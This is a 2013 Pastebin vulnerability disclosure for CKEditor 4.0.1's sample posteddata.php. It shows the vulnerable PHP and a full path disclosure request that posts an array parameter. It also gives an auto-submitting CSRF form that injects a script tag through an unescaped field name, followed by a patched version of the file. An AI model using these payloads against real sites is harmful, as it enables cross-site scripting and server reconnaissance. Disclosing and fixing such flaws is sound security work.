API tools faq
paste
Advertisement
Guest User

ckeditor4.0.1_XSS_FPDisclosure

a guest
Feb 18th, 2013
343
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.31 KB | None | 0 0
raw download clone embed print report
  1. ===========================================
  2. Vulnerable Software: ckeditor 4.0.1 standard
  3. Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
  4. Vulns: Full Path Disclosure && XSS
  5. ===========================================
  6. Tested On: Debian squeeze 6.0.6
  7. Server version: Apache/2.2.16 (Debian)
  8. Apache traffic server 3.2.0
  9. MYSQL: 5.1.66-0+squeeze1
  10. PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
  11. Copyright (c) 1997-2009 The PHP Group
  12. Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
  13. with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
  14. ===========================================
  15. Vulnerable Code: /ckeditor/samples/assets/posteddata.php
  16. =============SNIP BEGINS====================
  17.  
  18. root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
  19. <!DOCTYPE html>
  20. <?php
  21. /*
  22. Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
  23. For licensing, see LICENSE.html or http://ckeditor.com/license
  24. */
  25. ?>
  26. <html>
  27. <head>
  28. <meta charset="utf-8">
  29. <title>Sample &mdash; CKEditor</title>
  30. <link rel="stylesheet" href="sample.css">
  31. </head>
  32. <body>
  33. <h1 class="samples">
  34. CKEditor &mdash; Posted Data
  35. </h1>
  36. <table border="1" cellspacing="0" id="outputSample">
  37. <colgroup><col width="120"></colgroup>
  38. <thead>
  39. <tr>
  40. <th>Field&nbsp;Name</th>
  41. <th>Value</th>
  42. </tr>
  43. </thead>
  44. <?php
  45.  
  46. if ( isset( $_POST ) )
  47. $postArray = &$_POST ; // 4.1.0 or later, use $_POST
  48. else
  49. $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
  50.  
  51. foreach ( $postArray as $sForm => $value )
  52. {
  53. if ( get_magic_quotes_gpc() )
  54. $postedValue = htmlspecialchars( stripslashes( $value ) ) ;
  55. else
  56. $postedValue = htmlspecialchars( $value ) ;
  57.  
  58. ?>
  59. <tr>
  60. <th style="vertical-align: top"><?php echo $sForm?></th>
  61. <td><pre class="samples"><?php echo $postedValue?></pre></td>
  62. </tr>
  63. <?php
  64. }
  65. ?>
  66. </table>
  67. <div id="footer">
  68. <hr>
  69. <p>
  70. CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
  71. </p>
  72. <p id="copy">
  73. Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
  74. </p>
  75. </div>
  76. </body>
  77. </html>
  78.  
  79.  
  80. =============SNIP ENDS HERE====================
  81.  
  82.  
  83.  
  84. FULL Path Disclosure example:
  85.  
  86. URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
  87. METHOD: $_POST
  88.  
  89. HEADERS:
  90.  
  91. Host: hacker1.own
  92. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
  93. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  94. Accept-Language: en-US,en;q=0.5
  95. Accept-Encoding: gzip, deflate
  96. DNT: 1
  97. Connection: keep-alive
  98. Content-Type: application/x-www-form-urlencoded
  99. Content-Length: 30
  100.  
  101.  
  102.  
  103. $_POST DATA TO SEND:
  104.  
  105.  
  106. bangbangbang[]=PATH DISCLOSURE
  107.  
  108.  
  109.  
  110.  
  111. Result:
  112. Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38
  113.  
  114. Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
  115.  
  116.  
  117. =================================================
  118.  
  119. CSRF+XSS
  120. <body onload="javascript:document.forms[0].submit()">
  121. <form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
  122. <input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
  123. </form>
  124.  
  125. =================================================
  126.  
  127. Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png
  128.  
  129.  
  130.  
  131. =================================================
  132. And here is fixed version: /ckeditor/samples/assets/posteddata.php
  133.  
  134. ================SNIP BEGINS=======================
  135. <!DOCTYPE html>
  136. <?php
  137. /*
  138. Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
  139. For licensing, see LICENSE.html or http://ckeditor.com/license
  140. */
  141. ?>
  142. <html>
  143. <head>
  144. <meta charset="utf-8">
  145. <title>Sample &mdash; CKEditor</title>
  146. <link rel="stylesheet" href="sample.css">
  147. </head>
  148. <body>
  149. <h1 class="samples">
  150. CKEditor &mdash; Posted Data
  151. </h1>
  152. <table border="1" cellspacing="0" id="outputSample">
  153. <colgroup><col width="120"></colgroup>
  154. <thead>
  155. <tr>
  156. <th>Field&nbsp;Name</th>
  157. <th>Value</th>
  158. </tr>
  159. </thead>
  160. <?php
  161.  
  162. if ( isset( $_POST ) )
  163. $postArray = &$_POST ; // 4.1.0 or later, use $_POST
  164. else
  165. $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
  166.  
  167. foreach ( $postArray as $sForm => $value )
  168. {
  169. if ( get_magic_quotes_gpc() )
  170. $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
  171. else
  172. $postedValue =htmlspecialchars((string) $value ) ;
  173.  
  174. ?>
  175. <tr>
  176. <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
  177. <td><pre class="samples"><?php echo $postedValue?></pre></td>
  178. </tr>
  179. <?php
  180. }
  181. ?>
  182. </table>
  183. <div id="footer">
  184. <hr>
  185. <p>
  186. CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
  187. </p>
  188. <p id="copy">
  189. Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
  190. </p>
  191. </div>
  192. </body>
  193. </html>
  194.  
  195. =============ENJOYYY====================
  196.  
  197. KUDOSSSSSSS
  198. =========================================
  199. packetstormsecurity.org
  200. packetstormsecurity.com
  201. packetstormsecurity.net
  202. securityfocus.com
  203. cxsecurity.com
  204. security.nnov.ru
  205. securtiyvulns.com
  206. securitylab.ru
  207. secunia.com
  208. securityhome.eu
  209. exploitsdownload.com
  210. osvdb.com
  211. websecurity.com.ua
  212. 1337day.com
  213. itsecuritysolutions.org
  214.  
  215. to all Aa Team + to all Azerbaijan Black HatZ
  216. + *Especially to my bro CAMOUFL4G3 *
  217. To All Turkish Hackers
  218.  
  219. Also special thanks to: ottoman38 & HERO_AZE
  220. ===========================================
  221.  
  222. /AkaStep
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!